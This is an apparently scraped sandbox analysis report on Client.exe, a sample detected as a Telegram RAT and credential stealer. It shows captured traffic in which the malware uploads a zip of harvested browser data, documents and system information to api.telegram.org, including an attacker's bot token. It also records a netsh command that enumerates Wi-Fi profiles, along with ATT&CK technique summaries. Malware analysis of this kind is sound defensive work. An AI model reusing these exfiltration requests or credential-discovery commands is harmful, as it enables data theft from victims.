2024-08-30 05:14:14 UTC	16355	OUT	Data Raw: 0a 8b ef 73 d1 4a 95 71 15 74 cf 4f d7 0a 4b c8 c8 f1 3b a0 92 1b ec c6 0e 86 0f 84 de fd d5 a7 7d 1f cc 99 77 9a 8f 77 2c 5f 93 df fe bc ff e2 64 f1 15 01 f0 1b 23 00 11 18 fc 35 9e 8b 7e 5e a0 ff a7 1f a4 f2 9d 23 aa 17 d4 0c 3d d2 37 dd c3 6f d9 d8 a0 44 2e 03 4f 23 5d d3 5c 8c 7f c3 bd 0e ed 6d dd 8e d4 ee cb 50 11 a7 42 9c 7b 4c 9f ba 73 a4 bb a2 ad 9f c8 a7 9f af e3 a2 cb 36 8a 1d 41 6a e5 b8 89 5e 72 6f be b3 63 9e 59 6a 2f 3c 31 d1 f5 f2 cb 9d 5e 4e 91 2c 62 40 e8 af 76 89 73 92 35 ec ec 84 ba 01 b6 be b4 6b f2 ac b6 3a f6 af 44 df 8d 68 da cb 32 a7 23 66 6d bd 70 a1 c9 db 7d 9d 13 2f c7 d7 83 a6 1b b6 13 0b 06 82 42 24 2d 4a 57 f6 ca 47 d6 e7 6c 3e e9 45 15 97 54 9c fb 2a 67 97 b0 dd 47 1a 1a db 0c bd 08 86 52 d8 d3 14 07 3c a2 cd f9 f0 d8 8a ac Data Ascii: sJqtOK;}ww,_d#5~^#=7oD.O#]\mPB{Ls6Aj^rocYj/<1^N,b@vs5k:Dh2#fmp}/B$-JWGl>ET*gGR<
2024-08-30 05:14:14 UTC	16355	OUT	Data Raw: fa 7a 9d 47 08 7c 09 32 85 3a 2e 54 f3 18 14 fc fe 7d 4f 4a 6a 4f 2a dd 56 98 be d4 d8 c1 e6 a4 65 5d 96 10 41 de da 47 fb 03 09 51 a9 bf b4 a8 d2 b0 40 35 13 e7 ae f9 4a 98 ac ab b4 e1 39 a0 c4 18 a3 64 59 30 71 2c aa 2d ef 72 fd 58 d9 86 26 f3 e8 e0 0b ae e8 ab e3 d6 f3 aa b4 e7 6f 15 c3 15 7e 29 48 df df b2 6a 8c 5e 63 58 44 da 5a 2d e5 58 35 c5 24 1f 23 5f cb ac 1a c6 ae f6 2b d5 ba 12 ee 14 3d a2 f4 41 2f bf eb 96 a5 7b ed c6 e8 c1 c0 01 26 72 62 f5 b3 46 c3 bb 60 96 f7 48 b4 3f b9 90 78 be f0 48 7f 70 f5 25 bd b2 2d a6 32 4c d3 d6 4a a7 c4 bb ad 18 99 0c 57 eb 38 ae ae 67 93 21 f4 77 0e 7f ee ef 17 e7 d6 a7 dd b5 1b 81 5f 7e 21 a4 27 fe 85 4d 75 26 5e 47 37 25 d9 79 18 6a 12 cc 01 cd 5e f8 46 59 93 bc 5f fb 1d 7f 85 d6 98 10 23 9b cb be 4e 24 aa 2f Data Ascii: zG\|2:.T}OJjO*Ve]AGQ@5J9dY0q,-rX&o~)Hj^cXDZ-X5$#_+=A/{&rbF`H?xHp%-2LJW8g!w_~!'Mu&^G7%yj^FY_#N$/
2024-08-30 05:14:16 UTC	928	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 30 Aug 2024 05:14:16 GMT Content-Type: application/json Content-Length: 540 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":81100,"from":{"id":5344934242,"is_bot":true,"first_name":"Hey skid, add me on discord: _marvim_","username":"HackinGusers_databot"},"chat":{"id":1619136628,"first_name":"GarY","username":"Sunny_Hooda_11","type":"private"},"date":1724994855,"document":{"file_name":"C_UsersuserAppDataLocal5b36406dec02be6919cea39af9325731engin.zip","mime_type":"application/zip","file_id":"BQACAgUAAxkDAAEBPMxm0VUn3nsvI-l6b95dN9Wtk4GAHgACwhIAAhXSiVaisilSuCC-5TUE","file_unique_id":"AgADwhIAAhXSiVY","file_size":187017}}}

Timestamp	Bytes transferred	Direction	Data
2024-08-30 05:14:16 UTC	254	OUT	POST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1 Content-Type: multipart/form-data; boundary="4918a032-b9c9-40e8-81a3-dfca8ed2bf78" Host: api.telegram.org Content-Length: 187378 Expect: 100-continue
2024-08-30 05:14:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-08-30 05:14:17 UTC	40	OUT	Data Raw: 2d 2d 34 39 31 38 61 30 33 32 2d 62 39 63 39 2d 34 30 65 38 2d 38 31 61 33 2d 64 66 63 61 38 65 64 32 62 66 37 38 0d 0a Data Ascii: --4918a032-b9c9-40e8-81a3-dfca8ed2bf78
2024-08-30 05:14:17 UTC	277	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 35 62 33 36 34 30 36 64 65 63 30 32 62 65 36 39 31 39 63 65 61 33 39 61 66 39 33 32 35 37 33 31 5c 65 6e 67 69 6e 65 65 72 40 38 34 39 32 32 34 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 65 6e 67 69 6e 65 65 72 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 35 62 33 36 34 30 36 64 65 63 30 32 62 65 36 39 31 39 63 65 61 33 39 61 66 39 33 32 35 37 33 31 25 35 43 65 6e 67 69 6e 65 65 72 25 Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C5b36406dec02be6919cea39af9325731%5Cuser%
2024-08-30 05:14:17 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 6a 30 1e 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 6a 30 1e 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 c0 09 1e 59 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 c0 09 1e 59 1c cd a3 86 72 01 00 00 31 04 00 00 17 00 00 00 44 Data Ascii: PKj0YBrowsers\Edge\PKj0YBrowsers\Google\PKYQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKYr1D
2024-08-30 05:14:17 UTC	16355	OUT	Data Raw: 19 39 45 b3 7d a5 b6 ec 26 bb ed 5a df 1f b4 68 c8 df c4 c1 48 81 c0 a0 62 5f 2b a5 25 74 2e ae 6d 2b 39 b7 ae 9d 32 24 c1 ef ef 1f 50 4b 03 04 14 00 00 00 08 00 e9 15 45 57 4d 16 48 75 84 02 00 00 02 04 00 00 36 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 65 73 6b 74 6f 70 5c 53 46 50 55 53 41 46 49 4f 4c 2e 64 6f 63 78 0d 92 49 8e 45 21 0c 03 f7 2d fd 43 01 61 0c 63 48 78 c0 fd 0f d2 ec 90 00 3b 8e 6b ba 2e 53 b9 d8 32 14 a6 2a ec 2b 27 f9 9c f9 e6 9d e1 b3 b0 36 e1 a2 31 92 90 3a 5f fe 44 34 47 b4 d5 b5 8d 9f b2 b1 0c 1b 6f bd 95 14 8c ae f8 7a 53 a0 13 ec 3c fc 15 97 ae bf 40 3c 57 35 41 49 2f 94 3b f5 8b 7e a9 b5 8f 5d 06 6d c0 52 92 c7 99 5a 93 e3 4f 06 88 f6 04 9a 22 9d 5a d7 3e 15 b6 d4 Data Ascii: 9E}&ZhHb_+%t.m+92$PKEWMHu6Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.docxIE!-CacHx;k.S2*+'61:_D4GozS<@<W5AI/;~]mRZO"Z>
2024-08-30 05:14:17 UTC	16355	OUT	Data Raw: cf f8 50 28 67 21 40 f1 fe 07 f1 77 43 07 bc b0 6f c4 53 d7 f0 10 4c 14 93 9e f7 8a 56 2d 56 0f de 9d e4 71 59 84 cb 7a dc b8 9e b0 9e 00 fd d9 60 eb 50 ee dc 11 20 a4 c7 a6 28 b7 75 60 1f 66 d1 78 f9 f2 38 f4 d2 b6 2a 8e 33 a7 1a 9b b6 d8 68 ef 19 ed bb cb d1 f1 23 9d 33 46 5b 9d c6 ed a7 1e a3 0a 87 a7 f8 2d 21 85 1a 6d 9a 5d e4 6c 27 af 46 d0 d9 5f ff 8d aa 59 19 bb f9 56 74 ab f5 5e 9e 05 92 3b 51 6f e9 0a 74 c4 1d 1c 7e ca 0d 96 51 5b a9 f3 35 c8 7d 2c ce 21 47 57 50 5f 1b 8c 21 32 a3 5f 7d c7 9a e5 de 2e 39 3e 64 54 3e 91 66 a9 2d 5b bd 3d 48 ab c7 94 10 b4 5d 9f 82 d3 49 7f 56 dc 25 c3 d0 5e ed 1e 94 1e 71 14 17 44 f9 9c 1b 9a 1c 85 ce a2 cc b9 2d 5f af de f4 86 59 b1 86 92 ca fb 54 02 d8 20 8d ac 99 c5 e8 fd 59 ad b5 45 68 b3 81 eb 7e 6b e0 d3 72 Data Ascii: P(g!@wCoSLV-VqYz`P (u`fx8*3h#3F[-!m]l'F_YVt^;Qot~Q[5},!GWP_!2_}.9>dT>f-[=H]IV%^qD-_YT YEh~kr
2024-08-30 05:14:17 UTC	16355	OUT	Data Raw: ba 24 cd 8d 19 9f 5b b6 df 5a c5 75 5b 52 4c 62 4b 31 41 d8 76 d3 0a 6c c3 61 65 7b 6d 3d 33 52 50 4c 52 f2 c3 6e d5 fc 86 bb f8 49 94 cb 8b 62 19 b0 87 2c c5 29 dd d4 e8 9b c2 b1 bd c7 81 d7 da 4b 13 cc 16 20 4f a3 d5 32 3b e6 ce a6 00 3b 10 35 02 2b 47 d1 9e 80 56 9f 51 50 ba af db bd 33 9e 2b 62 87 d9 18 ad 3d a4 ea 2b ed be c9 5e ad 54 4d 9c 7a ca d0 f3 34 ba cf 9d ca 5e eb b3 0e ef b9 56 1d 2e c0 39 a8 66 f2 76 c4 2c d7 57 57 8c 85 ee 20 9c 33 9d 22 e5 8e c7 a1 c9 db 32 38 44 aa 45 a0 96 cd 9a 07 b5 b2 3b ee 34 9f 82 98 26 de b9 6a 0d 1e be 9a f6 d5 71 dc 7a db c3 b2 6b 8a 64 d3 8e a0 eb 2e 3e 02 e5 7a 0e 4e 27 ea dc a5 5d f2 b8 f2 6c ef 80 78 c2 75 46 0e c5 af f1 e1 69 1a d2 96 96 e3 33 2d b9 4b 76 b4 a9 de 6b 29 03 1a a6 7b 6b 67 3c a2 4c f2 a8 88 Data Ascii: $[Zu[RLbK1Avlae{m=3RPLRnIb,)K O2;;5+GVQP3+b=+^TMz4^V.9fv,WW 3"28DE;4&jqzkd.>zN']lxuFi3-Kvk){kg<L
2024-08-30 05:14:17 UTC	16355	OUT	Data Raw: 0f af 2b dc 90 cc a4 1e 4b 0c dc 58 fb ef a3 d0 10 37 26 f4 e3 3d b6 6a fb 91 63 59 61 aa a5 8a 77 c1 35 dd 1e ec 97 c1 e8 de af a6 ef 24 5d d7 17 75 df c1 ed 7b a2 25 52 5d ee ed 56 31 9b e0 ee 07 1b ab f2 e3 52 a2 e6 33 91 1d 31 68 fe 9a c3 dc c4 c9 8b 7b 4a 3d 46 1c 57 9a 5b 15 1d 22 c4 1a 41 29 38 3e 41 5a 7a 3e 96 9e 58 cb 53 f6 56 ec 9a 0b 7e b1 a9 68 8c 90 fd 76 ee f3 d8 66 d3 4c 33 28 7e c5 88 85 b2 e7 89 19 a7 29 7a 75 3a 44 99 95 fe c4 6c 43 04 ec 1a 1f c7 77 ac c9 78 4f be 6d 47 eb 6a a3 86 39 87 47 f2 a9 d3 79 32 2b 56 ad eb 55 5c f2 0e 63 af 82 5f ab 5a f4 34 f8 1d 71 a6 05 1f 97 4c 63 55 f9 82 22 57 0a 4a 8c a3 52 3f 47 e2 31 98 e7 7e bc e4 28 35 3d db 5a 5a 78 68 e4 1a bd 7d d7 a1 4e db e5 4b cb 82 89 7a db b5 d2 23 05 df b5 f2 d9 55 e3 38 Data Ascii: +KX7&=jcYaw5$]u{%R]V1R31h{J=FW["A)8>AZz>XSV~hvfL3(~)zu:DlCwxOmGj9Gy2+VU\c_Z4qLcU"WJR?G1~(5=ZZxh}NKz#U8
2024-08-30 05:14:17 UTC	16355	OUT	Data Raw: 40 07 90 b3 02 00 00 67 3d 00 00 12 00 00 00 53 79 73 74 65 6d 5c 57 69 6e 64 6f 77 73 2e 74 78 74 dd 5b db 8e 9a 50 14 7d d6 af e0 b1 7d 28 39 77 c0 37 c7 11 75 2e c6 5b 83 4e 48 8c e8 a9 63 bd 60 01 8b f6 eb 4b cd 8c 71 d2 4e 9a b4 3e b8 ce ab c0 f1 2c d8 6b ed b5 f7 86 76 f5 b1 5e b1 ea cb a7 9e df 99 75 bb ed fe b0 fe bd 11 3c 94 4b 83 d6 e0 a1 38 d2 d6 b9 35 98 44 d6 27 ab 11 c7 f3 95 b6 6a cf 49 bc d6 e5 52 a7 75 5b b1 98 74 49 b9 54 1f 16 27 d6 2a 61 27 89 e7 c9 64 6d f9 8b 95 4e ad 0f 7b 57 7d 0c a3 a4 de 5d a5 b5 20 98 cc 77 bb 7e ef 87 1f 35 6e 83 aa 3f f5 3f 77 82 69 de 1c 6e ef 9e ee 9b d1 7d f1 5f a3 cd 5d b2 1a 35 1e b7 bd 64 f7 6d ee 7f 6d af 77 37 a3 c9 b4 93 0c a3 28 59 26 cb ae 1f fe b6 4d 5b ef 75 b9 dc fe 2f 0c 92 2a 81 8e 81 ba f8 cf Data Ascii: @g=System\Windows.txt[P}}(9w7u.[NHc`KqN>,kv^u<K85D'jIRu[tIT'a'dmN{W}] w~5n??win}_]5dmmw7(Y&M[u/
2024-08-30 05:14:17 UTC	16355	OUT	Data Raw: 0a 8b ef 73 d1 4a 95 71 15 74 cf 4f d7 0a 4b c8 c8 f1 3b a0 92 1b ec c6 0e 86 0f 84 de fd d5 a7 7d 1f cc 99 77 9a 8f 77 2c 5f 93 df fe bc ff e2 64 f1 15 01 f0 1b 23 00 11 18 fc 35 9e 8b 7e 5e a0 ff a7 1f a4 f2 9d 23 aa 17 d4 0c 3d d2 37 dd c3 6f d9 d8 a0 44 2e 03 4f 23 5d d3 5c 8c 7f c3 bd 0e ed 6d dd 8e d4 ee cb 50 11 a7 42 9c 7b 4c 9f ba 73 a4 bb a2 ad 9f c8 a7 9f af e3 a2 cb 36 8a 1d 41 6a e5 b8 89 5e 72 6f be b3 63 9e 59 6a 2f 3c 31 d1 f5 f2 cb 9d 5e 4e 91 2c 62 40 e8 af 76 89 73 92 35 ec ec 84 ba 01 b6 be b4 6b f2 ac b6 3a f6 af 44 df 8d 68 da cb 32 a7 23 66 6d bd 70 a1 c9 db 7d 9d 13 2f c7 d7 83 a6 1b b6 13 0b 06 82 42 24 2d 4a 57 f6 ca 47 d6 e7 6c 3e e9 45 15 97 54 9c fb 2a 67 97 b0 dd 47 1a 1a db 0c bd 08 86 52 d8 d3 14 07 3c a2 cd f9 f0 d8 8a ac Data Ascii: sJqtOK;}ww,_d#5~^#=7oD.O#]\mPB{Ls6Aj^rocYj/<1^N,b@vs5k:Dh2#fmp}/B$-JWGl>ET*gGR<
2024-08-30 05:14:17 UTC	16355	OUT	Data Raw: fa 7a 9d 47 08 7c 09 32 85 3a 2e 54 f3 18 14 fc fe 7d 4f 4a 6a 4f 2a dd 56 98 be d4 d8 c1 e6 a4 65 5d 96 10 41 de da 47 fb 03 09 51 a9 bf b4 a8 d2 b0 40 35 13 e7 ae f9 4a 98 ac ab b4 e1 39 a0 c4 18 a3 64 59 30 71 2c aa 2d ef 72 fd 58 d9 86 26 f3 e8 e0 0b ae e8 ab e3 d6 f3 aa b4 e7 6f 15 c3 15 7e 29 48 df df b2 6a 8c 5e 63 58 44 da 5a 2d e5 58 35 c5 24 1f 23 5f cb ac 1a c6 ae f6 2b d5 ba 12 ee 14 3d a2 f4 41 2f bf eb 96 a5 7b ed c6 e8 c1 c0 01 26 72 62 f5 b3 46 c3 bb 60 96 f7 48 b4 3f b9 90 78 be f0 48 7f 70 f5 25 bd b2 2d a6 32 4c d3 d6 4a a7 c4 bb ad 18 99 0c 57 eb 38 ae ae 67 93 21 f4 77 0e 7f ee ef 17 e7 d6 a7 dd b5 1b 81 5f 7e 21 a4 27 fe 85 4d 75 26 5e 47 37 25 d9 79 18 6a 12 cc 01 cd 5e f8 46 59 93 bc 5f fb 1d 7f 85 d6 98 10 23 9b cb be 4e 24 aa 2f Data Ascii: zG\|2:.T}OJjO*Ve]AGQ@5J9dY0q,-rX&o~)Hj^cXDZ-X5$#_+=A/{&rbF`H?xHp%-2LJW8g!w_~!'Mu&^G7%yj^FY_#N$/
2024-08-30 05:14:17 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Fri, 30 Aug 2024 05:14:17 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Target ID:	0
Start time:	01:13:55
Start date:	30/08/2024
Path:	C:\Users\user\Desktop\Client.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Client.exe"
Imagebase:	0xd00000
File size:	174'080 bytes
MD5 hash:	E29AB30E42348ECF2831928B7B95D5D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	01:14:07
Start date:	30/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Execution Coverage:	15.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Client.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: AsyncRAT

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH.zip

C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Browsers\Firefox\Bookmarks.txt

C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Directories\Desktop.txt

C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Directories\Documents.txt

C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Directories\Downloads.txt

C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Directories\OneDrive.txt

C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Directories\Pictures.txt

C:\Users\user\AppData\Local\5b36406dec02be6919cea39af9325731\user@849224_en-CH\Directories\Startup.txt

Windows Analysis Report
Client.exe

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
